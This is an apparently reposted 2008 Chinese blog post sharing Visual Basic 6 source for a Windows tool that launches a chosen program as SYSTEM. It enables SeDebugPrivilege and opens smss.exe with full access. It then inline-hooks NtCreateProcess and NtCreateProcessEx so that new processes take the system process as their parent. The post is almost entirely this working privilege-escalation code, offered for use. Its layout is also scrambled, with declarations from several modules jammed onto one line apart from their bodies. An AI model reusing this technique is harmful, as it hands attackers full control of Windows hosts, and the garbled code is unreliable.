普通用户建立SYSTEM权限的进程,在桌面扔了好久了,发出来晾晾!
代码如下:
clsHookInfo.cls
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
Persistable = 0 'NotPersistable
DataBindingBehavior = 0 'vbNone
DataSourceBehavior = 0 'vbNone
MTSTransactionMode = 0 'NotAnMTSObject
END
Attribute VB_Name = "clsHookInfo"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Private Declare Function MessageBoxA Lib "user32" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
Private Declare Function MessageBoxW Lib "user32" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Private mbytOldCode(5) As Byte
Private mbytNewCode(5) As Byte
Private mlngFunAddr As Long
Private mhProcess As Long
Public Function HookApi(ByVal strDllName As String, ByVal strFunName As String, ByVal lngFunAddr As Long, ByVal hProcess As Long) As Boolean
Dim hModule As Long, dwJmpAddr As Long
mhProcess = hProcess
hModule = LoadLibrary(strDllName)
If hModule = 0 Then
HookApi = False
Exit Function
End If
mlngFunAddr = GetProcAddress(hModule, strFunName)
If mlngFunAddr = 0 Then
HookApi = False
Exit Function
End If
CopyMemory mbytOldCode(0), ByVal mlngFunAddr, 6
Debug.Print mbytOldCode(0); mbytOldCode(1); mbytOldCode(2); mbytOldCode(3); mbytOldCode(4)
mbytNewCode(0) = &HE9
dwJmpAddr = lngFunAddr - mlngFunAddr - 5
CopyMemory mbytNewCode(1), dwJmpAddr, 4
Debug.Print mbytNewCode(0); mbytNewCode(1); mbytNewCode(2); mbytNewCode(3); mbytNewCode(4)
HookStatus True
HookApi = True
End Function
Public Function HookStatus(ByVal blnIsHook As Boolean) As Boolean
If blnIsHook Then
If WriteProcessMemory(mhProcess, ByVal mlngFunAddr, mbytNewCode(0), 5, 0) <> 0 Then HookStatus = False '拦截
Else
If WriteProcessMemory(mhProcess, ByVal mlngFunAddr, mbytOldCode(0), 5, 0) <> 0 Then HookStatus = False '恢复
End If
End Function
Private Sub Class_Initialize()
' mhProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId)
End Sub
Private Sub Class_Terminate()
HookStatus False
' CloseHandle mhProcess
End Sub
VERSION 5.00 Private Type PROCESS_INFORMATION Private Type STARTUPINFO Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Sub cmdExit_Click() Private Sub cmdRun_Click() Private Sub Form_Load() Private Sub Form_Unload(Cancel As Integer) Attribute VB_Name = "modEnablePrivilege" Private Const STANDARD_RIGHTS_REQUIRED = &HF0000 Private Type LUID Private Type LUID_AND_ATTRIBUTES Private Type TOKEN_PRIVILEGES Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long Public Function EnablePrivilege() As Boolean modHook.bas Attribute VB_Name = "modHook" Public gclsHookNtCreateProcessEx As clsHookInfo Public Function NtCreateProcessExCallback(ByRef ProcessHandle As Long, ByVal AccessMask As Long, ByVal ObjectAttributes As Long, ByVal hParentProcess As Long, ByVal InheritHandles As Long, ByVal hSection As Long, ByVal hDebugPort As Long, ByVal hExceptionPort As Long, ByVal reserv As Long) As Long Public Function NtCreateProcessCallback(ByRef ProcessHandle As Long, ByVal AccessMask As Long, ByVal ObjectAttributes As Long, ByVal hParentProcess As Long, ByVal InheritHandles As Long, ByVal hSection As Long, ByVal hDebugPort As Long, ByVal hExceptionPort As Long) As Long Public Function GetFunAddr(lngFunAddr As Long) As Long Attribute VB_Name = "modProcess" Private Declare Function CloseHandle Lib "kernel32.dll" (ByVal Handle As Long) As Long 'Private Const PROCESS_QUERY_INFORMATION As Long = (&H400) Public Function GetSystemProcessId() As Long
frmMain.frm
Begin VB.Form frmMain
BorderStyle = 1 'Fixed Single
Caption = "创建系统进程"
ClientHeight = 3090
ClientLeft = 45
ClientTop = 435
ClientWidth = 4680
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
ScaleHeight = 3090
ScaleWidth = 4680
StartUpPosition = 3 '窗口缺省
Begin VB.CommandButton cmdExit
Caption = "退出"
Default = -1 'True
Height = 375
Left = 3510
TabIndex = 3
Top = 2010
Width = 945
End
Begin VB.CommandButton cmdRun
Caption = "启动"
Height = 375
Left = 2190
TabIndex = 2
Top = 2010
Width = 945
End
Begin VB.TextBox txtPath
Height = 255
Left = 960
TabIndex = 1
Text = "notepad"
Top = 1020
Width = 3525
End
Begin VB.Label lblNote
AutoSize = -1 'True
Caption = "文件路径:"
Height = 180
Left = 90
TabIndex = 0
Top = 1050
Width = 810
End
End
Attribute VB_Name = "frmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Byte
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Unload Me
End Sub
Dim lp As PROCESS_INFORMATION
Dim si As STARTUPINFO
si.cb = Len(si)
CreateProcess vbNullString, txtPath.Text, ByVal 0&, ByVal 0&, 0, 0, ByVal 0&, vbNullString, si, lp
End Sub
EnablePrivilege
'注意这里不能马上把句柄关闭掉
glngSystemHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, GetSystemProcessId)
If glngSystemHandle = 0 Then
MsgBox "获取系统进程句柄出错!!", vbCritical, "错误"
Exit Sub
End If
Set gclsHookNtCreateProcess = New clsHookInfo
Set gclsHookNtCreateProcessEx = New clsHookInfo
glngProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId)
gclsHookNtCreateProcessEx.HookApi "ntdll.dll", "NtCreateProcessEx", GetFunAddr(AddressOf NtCreateProcessExCallback), glngProcess
gclsHookNtCreateProcess.HookApi "ntdll.dll", "NtCreateProcess", GetFunAddr(AddressOf NtCreateProcessCallback), glngProcess
End Sub
Set gclsHookNtCreateProcess = Nothing
Set gclsHookNtCreateProcessEx = Nothing
CloseHandle glngSystemHandle
CloseHandle glngProcess
End Sub
modEnablePrivilege.bas
Option Explicit
Private Const TOKEN_ASSIGN_PRIMARY = &H1
Private Const TOKEN_DUPLICATE = (&H2)
Private Const TOKEN_IMPERSONATE = (&H4)
Private Const TOKEN_QUERY = (&H8)
Private Const TOKEN_QUERY_SOURCE = (&H10)
Private Const TOKEN_ADJUST_PRIVILEGES = (&H20)
Private Const TOKEN_ADJUST_GROUPS = (&H40)
Private Const TOKEN_ALL_ACCESS = 983551
Private Const SE_PRIVILEGE_ENABLED = &H2
Private Const ANYSIZE_ARRAY = 1
Private Const SE_DEBUG_NAME = "SeDebugPrivilege"
lowpart As Long
highpart As Long
End Type
pLuid As LUID
Attributes As Long
End Type
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type
Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPriv As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long 'Used to adjust your program's security privileges, can't restore without it!
Private Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As Any, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long '获取当前进程句柄
Dim hdlProcessHandle As Long
Dim hdlTokenHandle As Long
Dim tmpLuid As LUID
Dim tkp As TOKEN_PRIVILEGES
Dim tkpNewButIgnored As TOKEN_PRIVILEGES
Dim lBufferNeeded As Long
Dim lp As Long
hdlProcessHandle = GetCurrentProcess()
lp = OpenProcessToken(hdlProcessHandle, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hdlTokenHandle)
lp = LookupPrivilegeValue(vbNullString, "SeDebugPrivilege", tmpLuid)
tkp.PrivilegeCount = 1
tkp.Privileges(0).pLuid = tmpLuid
tkp.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
EnablePrivilege = AdjustTokenPrivileges(hdlTokenHandle, False, tkp, Len(tkpNewButIgnored), tkpNewButIgnored, lBufferNeeded)
End Function
Private Declare Function NtCreateProcessEx Lib "NTDLL.DLL" (ByRef ProcessHandle As Long, ByVal AccessMask As Long, ByVal ObjectAttributes As Long, ByVal hParentProcess As Long, ByVal InheritHandles As Long, ByVal hSection As Long, ByVal hDebugPort As Long, ByVal hExceptionPort As Long, ByVal reserv As Long) As Long
Private Declare Function NtCreateProcess Lib "NTDLL.DLL" (ByRef ProcessHandle As Long, ByVal AccessMask As Long, ByVal ObjectAttributes As Long, ByVal hParentProcess As Long, ByVal InheritHandles As Long, ByVal hSection As Long, ByVal hDebugPort As Long, ByVal hExceptionPort As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDescriptor As Long
SecurityQualityOfService As Long
End Type
Public gclsHookNtCreateProcess As clsHookInfo
Public glngProcess As Long
Public glngSystemHandle As Long
Dim hReturn As Long
gclsHookNtCreateProcessEx.HookStatus False
hReturn = NtCreateProcessEx(ProcessHandle, AccessMask, ObjectAttributes, glngSystemHandle, InheritHandles, hSection, hDebugPort, hExceptionPort, reserv)
gclsHookNtCreateProcessEx.HookStatus True
NtCreateProcessExCallback = hReturn
End Function
Dim hReturn As Long
gclsHookNtCreateProcess.HookStatus False
hReturn = NtCreateProcess(ProcessHandle, AccessMask, ObjectAttributes, glngSystemHandle, InheritHandles, hSection, hDebugPort, hExceptionPort)
gclsHookNtCreateProcess.HookStatus True
NtCreateProcessCallback = hReturn
End Function
GetFunAddr = lngFunAddr
End Function
modProcess.bas
Option Explicit
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
Private Declare Function EnumProcesses Lib "PSAPI.DLL" (ByRef lpidProcess As Long, ByVal cb As Long, ByRef cbNeeded As Long) As Long
Private Declare Function GetModuleFileNameExA Lib "PSAPI.DLL" (ByVal hProcess As Long, ByVal hModule As Long, ByVal ModuleName As String, ByVal nSize As Long) As Long
Private Declare Function EnumProcessModules Lib "PSAPI.DLL" (ByVal hProcess As Long, ByRef lphModule As Long, ByVal cb As Long, ByRef cbNeeded As Long) As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long '获取当前进程句柄
Private Declare Function GetLastError Lib "kernel32" () As Long
Private Declare Function GetModuleBaseName Lib "PSAPI.DLL" Alias "GetModuleBaseNameA" (ByVal hProcess As Long, ByVal hModule As Long, ByVal lpBaseName As String, ByVal nSize As Long) As Long
Private Const PROCESS_QUERY_INFORMATION = &H400
Private Const PROCESS_VM_READ = &H10
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Dim lngCbNeeded As Long
Dim lngNumElements As Long
Dim lngProcessIDArray() As Long
Dim lngCbNeeded2 As Long
Dim lngNumElements2 As Long
Dim Modules(0 To 1023) As Long
Dim lngRet As Long
Dim lngSize As Long
Dim hProcess As Long
Dim i As Long, strModuleName As String
Dim lngModules As Long, hLen As Long
ReDim lngProcessIDArray(1024)
lngRet = EnumProcesses(lngProcessIDArray(0), 4 * 1024, lngCbNeeded)
lngNumElements = lngCbNeeded / 4
ReDim Preserve lngProcessIDArray(lngNumElements - 1)
On Error Resume Next
For i = 0 To lngNumElements - 1
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, False, lngProcessIDArray(i))
If hProcess <> 0 And lngProcessIDArray(i) <> 4 Then
lngRet = EnumProcessModules(hProcess, Modules(0), 1024, lngCbNeeded2)
If lngRet <> 0 Then
strModuleName = String(260, "*")
lngRet = GetModuleFileNameExA(hProcess, Modules(0), strModuleName, 260)
strModuleName = Left(strModuleName, lngRet)
End If
If InStr(LCase(strModuleName), "system32\smss.exe") Then
'If InStr(LCase(strModuleName), "system32\winlogon.exe") Then
GetSystemProcessId = lngProcessIDArray(i)
lngRet = CloseHandle(hProcess)
Exit Function
End If
End If
lngRet = CloseHandle(hProcess)
Next
End Function
2008/11/19 | Tags:VB,编程,转载文章 | VB编程 | 查看评论(0)